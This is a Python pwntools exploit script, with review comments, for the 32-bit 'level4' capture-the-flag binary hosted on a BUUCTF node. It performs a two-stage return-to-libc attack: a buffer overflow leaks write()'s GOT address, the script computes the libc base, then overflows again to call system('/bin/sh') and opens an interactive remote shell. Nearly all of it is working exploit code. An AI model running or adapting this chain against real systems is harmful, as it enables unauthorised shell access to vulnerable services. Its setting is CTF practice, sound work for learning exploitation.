from pwn import *
# Two-stage return-to-libc walkthrough against the 32-bit `level4` challenge
# binary: stage 1 leaks the runtime address of write() from the GOT, stage 2
# reuses the same overflow to call system("/bin/sh").
# NOTE(review): the script is Python 2 only as written: it concatenates str
# with the output of p32()/p64(), and calls `.next()` on the result of
# libc.search().
# NOTE(review): the chain uses PLT/GOT/main addresses taken straight from the
# ELF file with no base adjustment and no canary value, so it presumably
# relies on a non-PIE binary built without a stack protector; confirm with
# checksec. A bounded read, stack canaries or PIE would each break it.
io=remote('node4.buuoj.cn',27888)
elf=ELF('./level4')
# Addresses read from the local copy of the binary.
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.sym['main']
# Stage 1: 0x88+4 filler bytes (presumably a buffer at ebp-0x88 plus the saved
# ebp; TODO confirm in a disassembler), then a 32-bit call frame for
# write(1, write_got, 4) that returns into main so the overflow can be
# triggered a second time.
# NOTE(review): the length argument is packed with p64(4), which emits 8 bytes
# in an otherwise 32-bit chain; the low 4 bytes still encode 4, but p32(4)
# would be consistent with the other words.
payload='a'*(0x88+4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p64(4)
io.send(payload)
# The 4 bytes received are interpreted as the resolved address of write().
# This assumes the service sends nothing before the leak; not verifiable here.
write_addr=u32(io.recv(4))
# Offsets come from a local libc file; the arithmetic below is only valid if
# it is the same build as the libc loaded by the remote process.
libc=ELF("./libc-2.23(32).so")
libc_write=libc.sym['write']
libc_sys=libc.sym['system']
libc_bin_sh=libc.search("/bin/sh\x00").next()
# Runtime libc base = leaked address minus the symbol's offset in the file.
libcbase=write_addr-libc_write
sys_addr=libcbase+libc_sys
bin_sh_addr=libcbase+libc_bin_sh
# Stage 2: same filler, then a frame for system(bin_sh_addr); main_addr fills
# the return-address slot of that call.
payload=(0x88+4)*'a'+p32(sys_addr)+p32(main_addr)+p32(bin_sh_addr)
io.send(payload)
# Hand the connection over to the terminal.
io.interactive()